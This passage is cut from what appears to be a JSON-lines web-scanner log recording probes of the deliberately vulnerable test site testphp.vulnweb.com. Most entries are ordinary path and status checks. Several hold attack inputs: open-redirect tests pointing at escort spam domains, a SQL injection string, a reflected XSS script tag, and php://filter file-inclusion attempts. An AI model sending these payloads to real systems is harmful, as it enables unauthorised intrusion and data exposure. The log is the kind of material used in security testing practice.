\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.880540977Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://bluelovenight.com/\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://bluelovenight.com/\",\"location\":\"https://bluelovenight.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://bluelovenight.com/\",\"time\":\"350.635008ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.88916205Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.priyaji.com/call-girls-in-gurgaon.html\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.priyaji.com/call-girls-in-gurgaon.html\",\"location\":\"https://www.priyaji.com/call-girls-in-gurgaon.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.priyaji.com/call-girls-in-gurgaon.html\",\"time\":\"349.467479ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.896619481Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.priyaji.com/\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.priyaji.com/\",\"location\":\"https://www.priyaji.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.priyaji.com/\",\"time\":\"357.17941ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.896662479Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.gigolobroker.in/\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.gigolobroker.in/\",\"location\":\"https://www.gigolobroker.in/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.gigolobroker.in/\",\"time\":\"358.026778ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.89671043Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.arishakhanna.com/\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.arishakhanna.com/\",\"location\":\"https://www.arishakhanna.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.arishakhanna.com/\",\"time\":\"355.095713ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.896796678Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.anjali-khanna.in/kolkata-escorts.html\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.anjali-khanna.in/kolkata-escorts.html\",\"location\":\"https://www.anjali-khanna.in/kolkata-escorts.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.anjali-khanna.in/kolkata-escorts.html\",\"time\":\"359.025178ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.126472231Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/search.php/login\",\"input\":\"http://testphp.vulnweb.com:80/search.php/login\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/search.php/login\",\"time\":\"339.036382ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.126544201Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"location\":\"shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"time\":\"338.933595ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.131108708Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=index.php\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=index.php\",\"location\":\"index.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=index.php\",\"time\":\"342.787731ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.131156011Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/robot.txt\",\"input\":\"http://testphp.vulnweb.com:80/robot.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/robot.txt\",\"time\":\"351.06158ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.134394896Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/reverse-ip\",\"input\":\"http://testphp.vulnweb.com:80/reverse-ip\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/reverse-ip\",\"time\":\"346.953729ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.13562317Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/rotots.txt\",\"input\":\"http://testphp.vulnweb.com:80/rotots.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/rotots.txt\",\"time\":\"342.314987ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.135789996Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/search.php?test=query'+0R+sqlspider\",\"input\":\"http://testphp.vulnweb.com:80/search.php?test=query'+0R+sqlspider\",\"title\":\"search\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/search.php?test=query'+0R+sqlspider\",\"time\":\"342.849461ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":106,\"status_code\":200,\"content_length\":4849,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.14157663Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/search.php.\",\"input\":\"http://testphp.vulnweb.com:80/search.php.\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/search.php.\",\"time\":\"354.321369ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.146573874Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/search.php\\u003cscript\\u003ealert(2)\\u003c/script\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/search.php%3Cscript%3Ealert(2)%3C/script%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/search.php%3Cscript%3Ealert%282%29%3C/script%3E\",\"time\":\"360.880092ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.146992221Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/secured\",\"input\":\"http://testphp.vulnweb.com:80/secured\",\"location\":\"http://testphp.vulnweb.com/secured/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/secured\",\"time\":\"355.888597ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.148526117Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/search.php?test=query\",\"input\":\"http://testphp.vulnweb.com:80/search.php?test=query\",\"title\":\"search\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/search.php?test=query\",\"time\":\"343.490979ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":104,\"status_code\":200,\"content_length\":4732,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.152669486Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/secured/database_connect.php\",\"input\":\"http://testphp.vulnweb.com:80/secured/database_connect.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/secured/database_connect.php\",\"time\":\"346.886654ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":27,\"lines\":3,\"status_code\":200,\"content_length\":224,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.153204004Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/search.php\",\"input\":\"http://testphp.vulnweb.com:80/search.php?\",\"title\":\"search\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/search.php\",\"time\":\"343.377626ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":104,\"status_code\":200,\"content_length\":4732,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:50.160297241Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/secured/newuser.php\",\"input\":\"http://testphp.vulnweb.com:80/secured/newuser.php\",\"title\":\"add new user\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/secured/newuser.php\",\"time\":\"361.404942ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":24,\"lines\":16,\"status_code\":200,\"content_length\":415,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.146037385Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php\",\"time\":\"339.617339ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.154088027Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php://filter/*\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php://filter/*\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php://filter/*\",\"time\":\"343.227609ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.154652198Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showforum.asp\",\"input\":\"http://testphp.vulnweb.com:80/showforum.asp\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showforum.asp\",\"time\":\"352.406426ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.164199731Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/see\",\"input\":\"http://testphp.vulnweb.com:80/see\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/see\",\"time\":\"351.922255ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.164704807Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/secured/newuser.php^upass=3868602\\u0026upass2=4313826\\u0026urname=2224847\\u0026ucc=4301701\\u0026uemail=7268928\\u0026uphone=2743223\\u0026signup=signup\\u0026uaddress=WCRTEXTAREATESTINPUT1088858\\u0026uuname=9235114\",\"input\":\"http://testphp.vulnweb.com:80/secured/newuser.php%5Eupass=3868602\\u0026upass2=4313826\\u0026urname=2224847\\u0026ucc=4301701\\u0026uemail=7268928\\u0026uphone=2743223\\u0026signup=signup\\u0026uaddress=WCRTEXTAREATESTINPUT1088858\\u0026uuname=9235114\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/secured/newuser.php%5Eupass=3868602\\u0026upass2=4313826\\u0026urname=2224847\\u0026ucc=4301701\\u0026uemail=7268928\\u0026uphone=2743223\\u0026signup=signup\\u0026uaddress=WCRTEXTAREATESTINPUT1088858\\u0026uuname=9235114\",\"time\":\"346.840038ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.164925277Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php://filter/convert.base64­encode/resource=showimage.php\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php://filter/convert.base64%C2%ADencode/resource=showimage.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php://filter/convert.base64%C2%ADencode/resource=showimage.php\",\"time\":\"348.379238ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.17198996Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.ph\",\"input\":\"http://testphp.vulnweb.com:80/showimage.ph\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.ph\",\"time\":\"351.205609ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.16630673Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/secured/style.css\",\"input\":\"http://testphp.vulnweb.com:80/secured/style.css\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/secured/style.css\",\"time\":\"347.161294ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":510,\"lines\":324,\"status_code\":200,\"content_length\":5482,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.17274718Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/sendcommand.php\",\"input\":\"http://testphp.vulnweb.com:80/sendcommand.php\",\"title\":\"add new user\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/sendcommand.php\",\"time\":\"358.800898ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":30,\"lines\":20,\"status_code\":200,\"content_length\":533,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.179899587Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php://filter\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php://filter\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php://filter\",\"time\":\"355.955605ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.262274218Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/secured/phpinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/secured/phpinfo.php\",\"title\":\"phpinfo()\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/secured/phpinfo.php\",\"time\":\"356.953071ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2329,\"lines\":679,\"status_code\":200,\"content_length\":45963,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:52.273873503Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/secured/phpinfo.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000\",\"input\":\"http://testphp.vulnweb.com:80/secured/phpinfo.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000\",\"title\":\"phpinfo()\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/secured/phpinfo.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000\",\"time\":\"362.605458ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2329,\"lines\":679,\"status_code\":200,\"content_length\":45963,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.248990059Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php=index.php\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php=index.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php=index.php\",\"time\":\"341.141076ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.25927405Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/signup.pho\",\"input\":\"http://testphp.vulnweb.com:80/signup.pho\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/signup.pho\",\"time\":\"342.118928ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.267138282Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php?file=8\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php?file=8\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php?file=8\",\"time\":\"356.710305ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":30,\"lines\":5,\"status_code\":200,\"content_length\":221,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.277313135Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/signup\",\"input\":\"http://testphp.vulnweb.com:80/signup\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/signup\",\"time\":\"342.647663ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.282212958Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"input\":\"http://testphp.vulnweb.com:80/shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"time\":\"350.594437ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.284830056Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/sign\",\"input\":\"http://testphp.vulnweb.com:80/sign\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/sign\",\"time\":\"361.200555ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.276366584Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/3.jpg\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/3.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php?file=./pictures/3.jpg\",\"time\":\"345.094338ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":55,\"lines\":55,\"status_code\":200,\"content_length\":9692,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.292570358Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/2.jpg\",\"input\":\"http://t